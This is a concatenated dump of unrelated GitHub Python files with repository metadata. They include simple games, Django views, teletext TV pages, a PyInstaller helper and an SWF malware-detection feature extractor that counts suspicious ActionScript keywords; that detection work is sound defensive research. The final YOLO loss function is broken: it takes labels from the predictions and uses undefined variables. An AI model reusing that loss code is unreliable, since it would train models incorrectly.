`RevenueEventItemInvoiceItem` | | Revenue Event Item Invoice Item Adjustment | `RevenueEventItemInvoiceItemAdjustment` | | Revenue Event Type | `RevenueEventType` | | Revenue 
Schedule | `RevenueSchedule` | | Revenue Schedule Credit Memo Item | `RevenueScheduleCreditMemoItem` | | Revenue Schedule Debit Memo Item | `RevenueScheduleDebitMemoItem` | | Revenue Schedule Invoice Item | `RevenueScheduleInvoiceItem` | | Revenue Schedule Invoice Item Adjustment | `RevenueScheduleInvoiceItemAdjustment` | | Revenue Schedule Item | `RevenueScheduleItem` | | Revenue Schedule Item Credit Memo Item | `RevenueScheduleItemCreditMemoItem` | | Revenue Schedule Item Debit Memo Item | `RevenueScheduleItemDebitMemoItem` | | Revenue Schedule Item Invoice Item | `RevenueScheduleItemInvoiceItem` | | Revenue Schedule Item Invoice Item Adjustment | `RevenueScheduleItemInvoiceItemAdjustment` | | Subscription | `Subscription` | | Taxable Item Snapshot | `TaxableItemSnapshot` | | Taxation Item | `TaxationItem` | | Updater Batch | `UpdaterBatch` | | Usage | `Usage` | # noqa: E501
OpenAPI spec version: 2018-08-23
Contact: docs@zuora.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import zuora_client
from zuora_client.models.proxy_create_unit_of_measure import ProxyCreateUnitOfMeasure # noqa: E501
from zuora_client.rest import ApiException
class TestProxyCreateUnitOfMeasure(unittest.TestCase):
    """Unit-test stubs for the ProxyCreateUnitOfMeasure model (auto-generated)."""

    def setUp(self):
        """No fixtures are needed for these stubs."""
        pass

    def tearDown(self):
        """Nothing to clean up."""
        pass

    def testProxyCreateUnitOfMeasure(self):
        """Placeholder test for constructing a ProxyCreateUnitOfMeasure."""
        # FIXME: construct object with mandatory attributes with example values
        # model = zuora_client.models.proxy_create_unit_of_measure.ProxyCreateUnitOfMeasure()  # noqa: E501
        pass
# Allow running this test module directly with the unittest runner.
if __name__ == '__main__':
    unittest.main()
| [
"jairo.velasco@alertlogic.com"
] | jairo.velasco@alertlogic.com |
6340dee6adbac9d8f5bda891d237f9e76491c8a4 | 44cdcb800301e68cbfe31e5c550ceaf592740783 | /Projects/birthday.py | b2404164f9fd759e8d21eda62405fca5ddf7fe53 | [] | no_license | cgu2022/NKC---Python-Curriculum | e945716e0a9f4d84bc89f8339a56e8f437da431d | 32abccd3417ecb033724c00e787caf5f2424c795 | refs/heads/master | 2021-06-19T15:29:10.607983 | 2021-05-01T12:37:48 | 2021-05-01T12:37:48 | 196,111,993 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,149 | py | import random
def genBirthday():
    """Return a uniformly random date of a 365-day year as 'month/day'."""
    days_in_month = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
    day_of_year = random.randint(1, 365)
    month = 1
    # Walk through the months, subtracting each month's length until the
    # remaining count falls inside the current month.
    for month_length in days_in_month:
        if day_of_year <= month_length:
            break
        day_of_year -= month_length
        month += 1
    return str(month) + "/" + str(day_of_year)
def simulate():
    """Run one birthday-paradox trial.

    Draw 23 random birthdays and report whether any two coincide.
    """
    birthdays = [genBirthday() for _ in range(23)]
    # A duplicate exists exactly when the set is smaller than the list.
    return len(set(birthdays)) < len(birthdays)
def simulateN(n):
    """Run n birthday-paradox trials and return the hit rate as 'xx.xx%'."""
    hits = sum(1 for _ in range(n) if simulate())
    return str(round(100 * (hits / n), 2)) + "%"
# main: estimate the birthday-paradox probability over 100000 trials
print(simulateN(100000))
| [
"noreply@github.com"
] | cgu2022.noreply@github.com |
9cbf4a3bca62efe29a5bbe29e089c41393a440e2 | 69649d74374ecb2e1fe1f7fcc276e07e9e53b534 | /LPAD/ch01_ex01.py | 3aa333ca62e2efe7ad4ce784419052574474f47e | [] | no_license | huilight/PythonPractice | 7d3a29f3dced6c1e4f0d7520a641fe9292d76910 | 4d22fa4e7c171fc73eb84d8fd9bc08c639356423 | refs/heads/master | 2020-06-21T08:09:55.344383 | 2019-09-09T15:13:41 | 2019-09-09T15:13:41 | 197,391,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,298 | py | import random
import textwrap
def show_theme_message(width=72):
    """Print the game title and back-story, wrapped to *width* columns."""
    show_dotted_line()
    # BUG FIX: the bold escape was mistyped as "\033[lm" (letter l); the
    # correct ANSI SGR bold sequence is "\033[1m" (digit one).
    print("\033[1m" + "Attack of The Orcs v0.0.1:" + "\033[0m")
    msg = (
        "The war between humans and their arch enemies, Orcs, was in the "
        "offing. Sir Foo, one of the brave knights guarding the southern "
        "plains began a long journey towards the east through an unknown "
        "dense forest. On his way, he spotted a small isolated settlement."
        " Thired and hoping to replenish his food stock, he decided to take"
        " a datour. As he approached the village, he saw five huts. There "
        "was no one to be seen around. Hesitantly, he decided to enter..")
    print(textwrap.fill(msg, width=width))
def show_game_mission():
    """Print the mission statement and a warning tip for the player."""
    print('\033[1m' + "Mission:" +"\033[0m")
    print("\tChoose a hut where Sir Foo can rest...")
    print("\033[1m" + "TIP:" + "\033[0m")
    print("Be careful as there are enemies luking around!")
    show_dotted_line()
def occupy_huts():
    """Return five huts, each randomly 'enemy', 'friend' or 'unoccupied'."""
    occupants = ['enemy', 'friend', 'unoccupied']
    return [random.choice(occupants) for _ in range(5)]
def process_user_choice():
    """Ask the player for a hut number (1-5) and return it as an int.

    NOTE(review): the input is not validated; a non-numeric entry raises
    ValueError here, and an out-of-range number only fails later when the
    hut list is indexed -- confirm this is acceptable.
    """
    # Prompt user to select a hut
    msg = "\033[1m" + "Choose a hut number to enter (1-5):" + "\033[0m"
    user_choice = input("\n" + msg)
    idx = int(user_choice)
    # Print the occupant info
    print("Revealing the occupants...")
    return idx
def reveal_occupants(idx, huts):
    """Print every hut's occupant, highlighting the chosen hut in bold."""
    parts = []
    for position, occupant in enumerate(huts, start=1):
        info = '<%d:%s>' % (position, occupant)
        if position == idx:
            info = "\033[1m" + info + "\033[0m"
        parts.append(info + " ")
    print("\t" + "".join(parts))
    show_dotted_line()
def enter_hut(idx, huts):
    """Announce the outcome of entering hut *idx* (1-based) of *huts*."""
    print("\033[1m" + "Entering hut %d... "%idx + "\033[0m", end=" ")
    # Determine and announce the winner
    if huts[idx-1] == 'enemy':
        print("\033[1m" + "YOU LOSE: (Better luck next time!)" +
              "\033[0m")
    else:
        print("\033[1m" + "Congratulations! YOU WIN!!!" + "\033[0m")
    show_dotted_line()
def print_bold(msg, end='\n'):
    """Print *msg* wrapped in ANSI bold escapes, terminated by *end*."""
    bold_on, bold_off = "\033[1m", "\033[0m"
    print(bold_on + msg + bold_off, end=end)
def show_dotted_line(width=72):
    """Print a horizontal separator made of *width* dashes."""
    separator = '-' * width
    print(separator)
def reset_health_meter(health_meter):
    """Restore both fighters to full strength (mutates the dict in place)."""
    health_meter.update(player=40, enemy=30)
def run_application():
    """Top-level game loop: show the intro, then replay until the user quits."""
    keep_playing = 'y'
    health_meter = {}
    show_theme_message()
    show_game_mission()
    while keep_playing == 'y':
        reset_health_meter(health_meter)
        play_game(health_meter)
        keep_playing = input("Play again? Yes(y)/No(n):")
def show_health(health_meter, bold=False):
    """Print the current hit points of Sir Foo and the enemy.

    When *bold* is truthy the line is wrapped in ANSI bold escapes.
    """
    status = "Sir Foo: {}, Enemy: {}".format(
        health_meter['player'], health_meter['enemy'])
    if bold:
        status = "\033[1m" + status + "\033[0m"
    print(status)
def play_game(health_meter):
    """Play one round: pick a hut; if an enemy is inside, fight it.

    NOTE(review): the source dump lost all indentation; this structure was
    reconstructed from the game flow and comments -- confirm against the
    upstream source.
    """
    huts = occupy_huts()
    idx = process_user_choice()
    reveal_occupants(idx, huts)
    if huts[idx-1] != 'enemy':
        print_bold("Congratulations! YOU WIN!!!")
    else:
        print_bold("ENEMY SIGHTED! ", end='')
        show_health(health_meter, bold=True)
        continue_attack = True
        while continue_attack:
            continue_attack = input("....continue attack? (y/n):")
            if continue_attack == 'n':
                print_bold("RUNNING AWAY with following health status..")
                # BUG FIX: bold was passed as the string "True"; it only
                # worked because any non-empty string is truthy.
                show_health(health_meter, bold=True)
                print_bold("Game Over!")
                # BUG FIX: without this break the fight kept going after the
                # player ran away ('n' is a truthy string, so the loop
                # condition never became false).
                break
            attack(health_meter)
            if health_meter['enemy'] <= 0:
                print_bold("Good Job! Enemy defeated! YOU WIN!!!")
                break
            if health_meter['player'] <= 0:
                print_bold("YOU LOSE! Better luck next time")
                break
def attack(health_meter):
    """Resolve one attack round.

    One side is injured at random (4-in-10 chance it is the player,
    6-in-10 the enemy) by 10-15 points, floored at zero.
    """
    hit_list = 4 * ['player'] + 6 * ['enemy']
    injured_unit = random.choice(hit_list)
    injury = random.randint(10, 15)
    health_meter[injured_unit] = max(health_meter[injured_unit] - injury, 0)
    print("ATTACK!", end='')
    show_health(health_meter)
if __name__ == '__main__':
run_application() | [
"huilight@outlook.com"
] | huilight@outlook.com |
c2e6a84944b141b5dc77b21793f0cc3085caa4fe | ecdf38c65523c3b00251753174a664b720ce5fc4 | /ninja_money/views.py | 8e33e15712b186d99d23d20dc0137dcbdae735c5 | [] | no_license | mixelectronico/NinjaGold | 26e2faa7fffa58a142c5571288cebd893d4dab3e | 76fcae3814f7e9c6ed1fd2ad08624f7a3cf170b9 | refs/heads/master | 2023-07-22T13:31:33.988698 | 2021-08-28T01:34:52 | 2021-08-28T01:34:52 | 400,649,346 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,396 | py | from django.shortcuts import render, redirect
from random import randint
from datetime import datetime
# Create your views here.
def inicio(request):
    """Render the landing page, creating the session counters on first visit."""
    session = request.session
    if 'gold_amount' not in session:
        # First visit: start with no gold and an empty activity log.
        session['gold_amount'] = 0
        session['moves'] = []
    return render(request, 'index.html')
def process_money(request):
    """Apply every money action present in the POST data, then redirect home.

    Each requested action adds a random prize (the casino may be negative)
    to the session's gold total and records [amount, place, timestamp] in
    the session's move log.
    """
    time = datetime.now().strftime("%Y-%m-%d %H:%M:%S %p")
    # (action name, minimum prize, maximum prize)
    prize_ranges = (
        ("farm", 10, 20),
        ("cave", 5, 10),
        ("house", 5, 10),
        ("casino", -50, 50),
    )
    for place, low, high in prize_ranges:
        if place in request.POST:
            prize = randint(low, high)
            request.session['gold_amount'] += prize
            request.session['moves'].append([prize, place, time])
    return redirect('/')
"mixelectronico@gmail.com"
] | mixelectronico@gmail.com |
23d66a5c1b26f0be833b0793a9aab76578a5d77b | 88849505c8d71c5fcc8d18fe2da3aa93a97f1e0e | /pages/600.py | 7a5c3a37a75edf30e4cef3ad8e503f06dd6d6ea5 | [
"MIT"
] | permissive | mscroggs/KLBFAX | 5322e025c41b30c6f160699e742c988c9e47ea88 | 3aaaa0cfe3b9772caa0a87e639efd9bce5b6adf4 | refs/heads/master | 2021-04-09T16:38:08.581934 | 2018-06-25T12:18:23 | 2018-06-25T12:18:26 | 31,314,664 | 5 | 1 | null | 2017-07-26T19:21:13 | 2015-02-25T13:26:38 | Python | UTF-8 | Python | false | false | 6,229 | py | from page import Page
from functions import klb_replace
import url_handler
class TVPage(Page):
    """Teletext page showing one channel's TV listings for Today or Tomorrow."""

    def __init__(self, page_num, channel, feed, day):
        super(TVPage, self).__init__(page_num)
        self.title = day+"'s TV: "+channel
        self.in_index = False
        self.channel = channel
        self.page_num = page_num
        self.feed = feed  # feed URL; background() may replace it with parsed data
        self.day = day  # "Today" or "Tomorrow"
        # Register this page in the module-level index used by page 600.
        pages.append([page_num,channel+" ("+day+")"])
        self.feed_type = None  # 1 = RSS via feedparser, 2 = bleb.org XML

    def generate_content(self):
        """Render the listings: channel title, day marker, then programmes."""
        from time import strptime, strftime
        self.add_title(self.channel)
        self.move_cursor(x=80-len(self.day))
        self.add_text(self.day, bg="YELLOW", fg="BLUE")
        self.move_cursor(x=0)
        if self.feed_type == 1:
            # RSS feed: collect every item's start time and title first.
            start_times = list()
            start_times_formatted = list()
            titles = list()
            for item in self.feed['items']:
                start_times.append(strptime(item['published'],"%m/%d/%Y %I:%M:%S %p"))
                start_times_formatted.append(strftime("%H%M",strptime(item['published'],"%m/%d/%Y %I:%M:%S %p")))
                titles.append(item['title'] )
            for i in range(len(titles)):
                # Show a programme if it is the last one listed or if the next
                # programme starts in the future (i.e. this one is still on).
                if i == len(titles)-1 or (int(strftime("%y%m%d%H%M",start_times[i+1])) > int(self.now().strftime("%y%m%d%H%M"))):
                    self.add_text(start_times_formatted[i],fg="GREEN")
                    self.add_text(" "+klb_replace(titles[i]))
                    self.add_newline()
        if self.feed_type == 2:
            # bleb.org XML: one <programme> element per show; skip programmes
            # that have already finished when showing Today's listings.
            for prog in self.e.findall('programme'):
                if int(prog.find('end').text)>int(self.now().strftime("%H%M")) or int(prog.find('start').text)>int(self.now().strftime("%H%M")) or self.day != "Today":
                    self.add_text(prog.find('start').text,fg="GREEN")
                    self.add_text(" "+klb_replace(prog.find('title').text))
                    self.add_newline()

    def background(self):
        """Fetch the listings data for this page before rendering.

        Radio pages 642/644 (today) and 692/694 (tomorrow) use
        iplayerconverter RSS feeds; every other page loads bleb.org XML.
        """
        from time import strptime, strftime
        import feedparser
        import datetime
        rss_dict = {"642": "http://www.iplayerconverter.co.uk/wu/2/date/" + strftime("%Y-%m-%d") + "/rss.aspx",
                    "692": "http://www.iplayerconverter.co.uk/wu/2/date/" + (datetime.date.today() + datetime.timedelta(days=1)).strftime("%Y-%m-%d") + "/rss.aspx",
                    "644": "http://www.iplayerconverter.co.uk/wu/4/date/" + strftime("%Y-%m-%d") + "/rss.aspx",
                    "694": "http://www.iplayerconverter.co.uk/wu/4/date/" + (datetime.date.today() + datetime.timedelta(days=1)).strftime("%Y-%m-%d") + "/rss.aspx"
                    }
        if self.page_num in rss_dict.keys():
            rss_url = rss_dict[self.page_num]
            self.feed = feedparser.parse(rss_url)
            self.feed_type = 1
        else:
            from xml.etree import ElementTree
            xml = url_handler.load(self.feed)
            self.e = ElementTree.fromstring(xml)
            self.feed_type = 2
# Registry of [page number, description] pairs; each TVPage constructor
# appends to it and the TVIPage index (page 600) renders it.
pages = []
# Today's listings on pages 601-616 (bleb.org day offset 0).
tv1 = TVPage("601","BBC1","http://bleb.org/tv/data/listings/0/bbc1.xml","Today")
tv2 = TVPage("602","BBC2","http://bleb.org/tv/data/listings/0/bbc2.xml","Today")
tv3 = TVPage("603","ITV","http://bleb.org/tv/data/listings/0/p_itv1.xml","Today")
tv4 = TVPage("604","Channel 4","http://bleb.org/tv/data/listings/0/ch4.xml","Today")
tv5 = TVPage("605","Channel 5","http://bleb.org/tv/data/listings/0/five.xml","Today")
tv6 = TVPage("606","ITV2","http://bleb.org/tv/data/listings/0/p_itv2.xml","Today")
tv7 = TVPage("607","S4C","http://bleb.org/tv/data/listings/0/s4c.xml","Today")
tv8 = TVPage("608","BBC4","http://bleb.org/tv/data/listings/0/bbc4.xml","Today")
tv9 = TVPage("609","Dave","http://bleb.org/tv/data/listings/0/dave.xml","Today")
tv10 = TVPage("610","More4","http://bleb.org/tv/data/listings/0/more4.xml","Today")
tv11 = TVPage("611","Film 4","http://bleb.org/tv/data/listings/0/film_four.xml","Today")
tv12 = TVPage("612","QVC","http://bleb.org/tv/data/listings/0/qvc.xml","Today")
tv13 = TVPage("613","E4","http://bleb.org/tv/data/listings/0/e4.xml","Today")
tv14 = TVPage("614","Challenge","http://bleb.org/tv/data/listings/0/challenge.xml","Today")
tv15 = TVPage("615","BBC News","http://bleb.org/tv/data/listings/0/bbc_news24.xml","Today")
tv16 = TVPage("616","BBC Parliament","http://bleb.org/tv/data/listings/0/bbc_parliament.xml","Today")
# Tomorrow's listings on pages 626-641 (bleb.org day offset 1).
tv19 = TVPage("626","BBC1","http://bleb.org/tv/data/listings/1/bbc1.xml","Tomorrow")
tv20 = TVPage("627","BBC2","http://bleb.org/tv/data/listings/1/bbc2.xml","Tomorrow")
tv21 = TVPage("628","ITV","http://bleb.org/tv/data/listings/1/p_itv1.xml","Tomorrow")
tv22 = TVPage("629","Channel 4","http://bleb.org/tv/data/listings/1/ch4.xml","Tomorrow")
tv23 = TVPage("630","Channel 5","http://bleb.org/tv/data/listings/1/five.xml","Tomorrow")
tv24 = TVPage("631","ITV2","http://bleb.org/tv/data/listings/1/p_itv2.xml","Tomorrow")
tv25 = TVPage("632","S4C","http://bleb.org/tv/data/listings/1/s4c.xml","Tomorrow")
tv26 = TVPage("633","BBC4","http://bleb.org/tv/data/listings/1/bbc4.xml","Tomorrow")
tv27 = TVPage("634","Dave","http://bleb.org/tv/data/listings/1/dave.xml","Tomorrow")
tv28 = TVPage("635","More4","http://bleb.org/tv/data/listings/1/more4.xml","Tomorrow")
tv29 = TVPage("636","Film 4","http://bleb.org/tv/data/listings/1/film_four.xml","Tomorrow")
tv30 = TVPage("637","QVC","http://bleb.org/tv/data/listings/1/qvc.xml","Tomorrow")
tv31 = TVPage("638","E4","http://bleb.org/tv/data/listings/1/e4.xml","Tomorrow")
tv32 = TVPage("639","Challenge","http://bleb.org/tv/data/listings/1/challenge.xml","Tomorrow")
tv33 = TVPage("640","BBC News","http://bleb.org/tv/data/listings/1/bbc_news24.xml","Tomorrow")
tv34 = TVPage("641","BBC Parliament","http://bleb.org/tv/data/listings/1/bbc_parliament.xml","Tomorrow")
class TVIPage(Page):
    """Index page 600: lists every registered TV & Radio listings page."""

    def __init__(self):
        super(TVIPage, self).__init__("600")
        self.title = "TV & Radio Index"

    def generate_content(self):
        """Render the page registry two entries per row."""
        self.add_title("TV & Radio")
        for position, entry in enumerate(pages):
            self.add_text(entry[0], fg="RED")
            self.add_text(" " + entry[1])
            # Newline after the right-hand column; otherwise jump to
            # column 38 for the second entry of the row.
            if position % 2 == 1:
                self.add_newline()
            else:
                self.move_cursor(x=38)
# Create the TV & Radio index page (page 600).
tp = TVIPage()
| [
"matthew.w.scroggs@gmail.com"
] | matthew.w.scroggs@gmail.com |
21daa5d528707849248fcfffbb82c9a8cdcdc4f6 | 1f61bad833f54f0f1e72e9c3a47677b93ff43b9b | /ParametersParser.py | 8be2e42ff9084d4f5027dfd3b0fc6c4851f4dd06 | [] | no_license | nick627/MachineLearningMalwareDetection | 6611166fcfbc310ed11dc8c1957ac0c29f1d33cb | 333f28723583a1868c26d90d3cfbecfef562598c | refs/heads/master | 2020-12-12T03:36:22.358166 | 2020-01-15T08:25:47 | 2020-01-15T08:25:47 | 234,033,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,772 | py |
import sys, os
import re, csv
from yaswfp import swfparser
# Input/output locations (Windows-style path fragments relative to the CWD).
MALWARE_FOLDER = '\\malware\\'
NORMAL_FOLDER = '\\normal\\'
TAGS_FILE = 'tags.txt'
PARAMETERS_FILE = 'parameters.csv'
LABELS_FILE = 'labels.csv'
# Suspicious ActionScript identifiers counted as features in each SWF tag.
KEY_WORDS = ['ActionScript3',
             'ExternalInterface',
             'hexToBin',
             'ToURL',
             'loadBytes']
# Known SWF tag names; populated from TAGS_FILE in main().
tags = []
def getTagsFromFile(filename):
    """Read the tag-list file and return its lines with whitespace stripped."""
    with open(filename) as tag_file:
        return [line.strip() for line in tag_file]
def getSignatureNumber(signature):
    """Map an SWF signature string to a numeric code (3 for anything unknown).

    CWS = zlib-compressed, FWS = uncompressed, ZWS = LZMA-compressed.
    """
    codes = {'CWS': 0, 'FWS': 1, 'ZWS': 2}
    return codes.get(signature, 3)
def getHeaderParameters(header):
    """Extract the 8 header features of a parsed SWF file.

    Layout: [FileLength, FrameCount, FrameRate, FrameSize x4, signature code].
    Missing or negative frame-size entries are reported as 0.
    """
    parameters = [0] * 8
    parameters[0] = header.FileLength
    parameters[1] = header.FrameCount
    parameters[2] = header.FrameRate
    try:
        # Copy element-by-element so a short FrameSize still fills what it can,
        # matching the original partial-assignment behaviour.
        for offset in range(4):
            parameters[3 + offset] = header.FrameSize[offset]
    except Exception:  # was a bare `except:`, which also swallowed SystemExit
        pass
    # Treat negative dimensions as absent.
    for index in range(3, 7):
        if parameters[index] < 0:
            parameters[index] = 0
    parameters[7] = getSignatureNumber(header.Signature)
    return parameters
def getBodyParameters(parser_tags):
    """Count body features over all SWF tags.

    Returns [iframe count, URL count] + per-keyword counts + per-tag-name
    counts (using the module-level `tags` list loaded in main()).
    """
    global tags
    parameters = []
    tagsCount = [0] * len(tags)
    numberOfIframes = 0
    numberOfUrls = 0
    keyWordsCount = [0] * len(KEY_WORDS)
    for tag in parser_tags:
        try:
            tagsCount[tags.index(tag.name)] += 1
        except Exception:  # tag name not in the known-tags list: not counted
            pass
        tag_text = str(tag)
        # Count tags containing each suspicious identifier.
        for i, word in enumerate(KEY_WORDS):
            if word in tag_text:
                keyWordsCount[i] += 1
        # BUG FIX: the pattern was r'http?://...' which means 'htt' plus an
        # optional 'p' -- it matched "htt://" and missed "https://".
        # 'https?://' matches both http and https URLs.
        urls = re.findall(r'https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', tag_text)
        numberOfUrls += len(urls)
        numberOfIframes += len(re.findall(r'<iframe src=', tag_text))
    parameters.append(numberOfIframes)
    parameters.append(numberOfUrls)
    parameters += keyWordsCount
    parameters += tagsCount
    return parameters
def parseFile(filename, isMalware):
    """Parse one SWF file and append its feature row and label to the CSVs.

    isMalware: 0 for benign samples, 1 for malware samples.
    Unparseable files are skipped with a message.
    """
    try:
        parser = swfparser.parsefile(filename)
    except Exception:  # was a bare `except:`, which also caught SystemExit
        print('[-] Can not parse the file')
        return
    parameters = getHeaderParameters(parser.header)
    print(parameters)
    parameters += getBodyParameters(parser.tags)
    with open(PARAMETERS_FILE, "a", newline="") as parameters_file:
        csv.writer(parameters_file).writerow(parameters)
    with open(LABELS_FILE, "a", newline="") as labels_file:
        csv.writer(labels_file).writerow([isMalware])
    return
def getFileList(directoryName):
    """Return the full paths of every entry directly inside *directoryName*."""
    return [os.path.join(directoryName, entry)
            for entry in os.listdir(directoryName)]
def main():
    """Extract features for all benign (label 0) then malware (label 1) SWFs."""
    global tags
    tags = getTagsFromFile(os.getcwd() + '\\' + TAGS_FILE)
    # The #""" markers below were used to comment the benign pass in and out.
    #"""
    filenames = getFileList(os.getcwd() + NORMAL_FOLDER)
    for i in range(0, len(filenames)):
        print('[*] Parsing of file (' + str(i) + ')', filenames[i])
        parseFile(filenames[i], 0)
        print('[+] File was successfully completed')
    #"""
    filenames = getFileList(os.getcwd() + MALWARE_FOLDER)
    for i in range(0, len(filenames)):
        print('[*] Parsing of file (' + str(i) + ')', filenames[i])
        parseFile(filenames[i], 1)
        print('[+] File was successfully completed')
# Run the feature extraction when executed as a script.
if __name__ == "__main__":
    main()
| [
"noreply@github.com"
] | nick627.noreply@github.com |
97ca46ca00e04fa7ebc437cc01b210f3ec956f47 | 0a2538e19103b5ffbb179709246b957ec69a4229 | /app/api/parsers.py | 450da81783e7ea1f012bab8de23054729a56611d | [] | no_license | johndpope/facecam-recognition | 1d8cf8c201d4c3115453d6116958ac52349868b3 | ff202b7ce2b5b8c9cc1e755be2d42603518b494d | refs/heads/master | 2023-05-30T14:11:11.639969 | 2020-07-09T18:25:47 | 2020-07-09T18:25:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | from flask_restplus import reqparse
from werkzeug.datastructures import FileStorage
# Request parser for the image-upload endpoint.
my_parser = reqparse.RequestParser()
# Single mandatory multipart-form file field named 'img'.
my_parser.add_argument('img',
                       location='files',
                       type=FileStorage,
                       required=True)
| [
"clemdecoop.pro@gmail.com"
] | clemdecoop.pro@gmail.com |
f2127ea102bdc9cf239348352ea3ae2b45fda7a5 | 3da5ea477d5b01809a9647ea949773a5a7d1782a | /Test.py | 13d700b116e885cf795d2b0b91ce2e2cedf96162 | [] | no_license | HeartBack/YDCGallery | e2b902b47eb5c966caae2d16a92f97c10878141e | 99a8db0cbf08420046d9d4fa5adb184ca836507c | refs/heads/master | 2020-12-02T11:15:26.897474 | 2017-07-09T10:31:41 | 2017-07-09T10:31:41 | 96,621,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | import keyboard
import pyperclip
import os
from tkinter import *
import subprocess,os
def exe(pyfile,dest="",creator=r"E:\software\Python36\Scripts\pyinstaller.exe",ico=r"C:\Users\Yi\Desktop\ico.ico",noconsole=False):
    """Build a one-file executable from *pyfile* with PyInstaller.

    dest: output directory ("./" when empty); creator: pyinstaller path;
    ico: icon file; noconsole: add --noconsole for windowed apps.
    NOTE(review): the default paths are machine-specific, and the command
    is built by string concatenation -- quoting breaks if a path contains '"'.
    """
    insert=""
    if dest:insert+='--distpath="{}"'.format(dest)
    # NOTE(review): this .format() call is a no-op -- the template has no
    # placeholder, so the source directory computed here is never used.
    else: insert+='--distpath="./"'.format(os.path.split(pyfile)[0])
    if ico: insert+=' --icon="{}" '.format(ico)
    if noconsole: insert+=' --noconsole '
    print(insert)
    runstring='"{creator}" "{pyfile}" {insert} -F'.format(**locals())
    subprocess.check_output(runstring)
def delet_file(dir):
    """Delete every '.toc' file directly inside *dir* (PyInstaller leftovers)."""
    for entry in os.listdir(dir):
        if entry.endswith(".toc"):
            os.remove(os.path.join(dir, entry))
# Clean PyInstaller .toc leftovers from the Desktop before building.
delet_file("C:\\Users\\Yi\\Desktop\\")
exe(pyfile='F:\\Python\\YDCGallery\\UI.py',dest='C:\\Users\\Yi\\Desktop\\UI',noconsole=True) | [
"Yi@Yi"
] | Yi@Yi |
1dffb0b8361ba0b1f56edaffd58b1fe54bca876f | 537cc3cd397900596be19e424d4eed8f57e611ea | /Basic/TemperatureConversion.py | 0464ff8fdaa0dffaf6644cfd9eedc6f90ec16a2f | [] | no_license | kushal200/python | d6dca96fc452d80181bcc0620e0889095e158d06 | 11d88936c3eacec10d2c717263b7a99f1ed270a1 | refs/heads/main | 2023-08-22T05:09:59.981135 | 2021-10-21T03:10:23 | 2021-10-21T03:10:23 | 405,541,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | tempC=float(input("Enter the vlaue of Celsius:"))
# Celsius -> Fahrenheit: F = C * 9/5 + 32 (tempC is read on the line above).
tempF=(tempC*1.8)+32
print("Conversion of celsius into fahrenheit is" ,tempF)
# Fahrenheit -> Celsius: C = (F - 32) * 5/9.
tempF=float(input("Enter the value of fahrenheit:"))
tempC=(tempF-32)/1.8
print("Conversion of fahrenheit into celsius is" ,tempC) | [
"kushal.shresth2057@gmal.com"
] | kushal.shresth2057@gmal.com |
59167cda4822d4d188f0b48379af89caca6a6189 | 9d4f706d1a92faad93f152e4e5e6c2e3cd05e3fd | /losses.py | 3062a8679832da9a7766d52894bfbaaef14b5074 | [] | no_license | mdrifaath786/object-detection_yolov4 | d4d35085158a79ba787340eb69bdab058cd95d40 | 6184f4c2815e70a3039dcf74dadd6e37a1d97401 | refs/heads/main | 2023-03-19T00:30:57.944967 | 2021-03-04T16:58:45 | 2021-03-04T16:58:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,330 | py | def loss(pred,target):
# ---- body of loss(pred, target); the def line is fused onto the row above ----
# NOTE(review): every label_* tensor below is sliced from `pred`, so the
# `target` argument is never used -- almost certainly a copy-paste bug
# (label_* should come from target); confirm against the upstream YOLOv4 code.
pred_xywh=pred[:,:,:,:,0:4]
pred_conf=pred[:,:,:,:,4:5]
pred_prob=pred[:,:,:,:,5:]
label_xywh=pred[:,:,:,:,0:4]
label_conf=pred[:,:,:,:,4:5]
label_prob=pred[:,:,:,:,5:]
# Complete-IoU between predicted and label boxes, with a trailing axis added.
ciou = tf.expand_dims(bbox_ciou(pred_xywh, label_xywh), axis=-1)
# NOTE(review): input_size, respond_bbox, bboxes, IOU_LOSS_THRESH, eps and
# bbox_iou are not defined in this file (and tf/np are never imported); the
# function cannot run as-is -- these look like lost module-level pieces.
input_size = tf.cast(input_size, tf.float32)
# Smaller boxes receive a larger localisation weight.
bbox_loss_scale = 2.0 - 1.0 * label_xywh[:, :, :, :, 2:3] * label_xywh[:, :, :, :, 3:4] / (input_size ** 2)
ciou_loss = respond_bbox * bbox_loss_scale * (1 - ciou)
iou = bbox_iou(pred_xywh[:, :, :, :, np.newaxis, :], bboxes[:, np.newaxis, np.newaxis, np.newaxis, :, :])
max_iou = tf.expand_dims(tf.reduce_max(iou, axis=-1), axis=-1)
# Background cells: no assigned object and best IoU below the threshold.
respond_bgd = (1.0 - respond_bbox) * tf.cast(max_iou < IOU_LOSS_THRESH, tf.float32)
# Focal-style weighting of the confidence loss.
conf_focal = tf.pow(respond_bbox - pred_conf, 2)
conf_loss = conf_focal * (respond_bbox * -(respond_bbox * tf.math.log(tf.clip_by_value(pred_conf, eps, 1.0)))+respond_bgd * -(respond_bgd * tf.math.log(tf.clip_by_value((1- pred_conf), eps, 1.0))))
# Binary cross-entropy over class probabilities, only where an object exists.
prob_loss = respond_bbox * -(label_prob * tf.math.log(tf.clip_by_value(pred_prob, eps, 1.0))+(1 - label_prob) * tf.math.log(tf.clip_by_value((1 - pred_prob), eps, 1.0)))
# Sum each loss over the box dimensions, then average over the batch.
ciou_loss = tf.reduce_mean(tf.reduce_sum(ciou_loss, axis=[1, 2, 3, 4]))
conf_loss = tf.reduce_mean(tf.reduce_sum(conf_loss, axis=[1, 2, 3, 4]))
prob_loss = tf.reduce_mean(tf.reduce_sum(prob_loss, axis=[1, 2, 3, 4]))
return ciou_loss, conf_loss, prob_loss
def bbox_ciou(boxes1, boxes2):
    """Complete-IoU between two box sets given as (cx, cy, w, h).

    Returns IoU minus a normalised centre-distance term and an
    aspect-ratio term, clipped to [-1.0, 0.99].
    NOTE(review): needs tensorflow as `tf` and numpy as `np`, neither of
    which is imported anywhere in this file.
    """
    # Convert centre/size format to corner format (x1, y1, x2, y2).
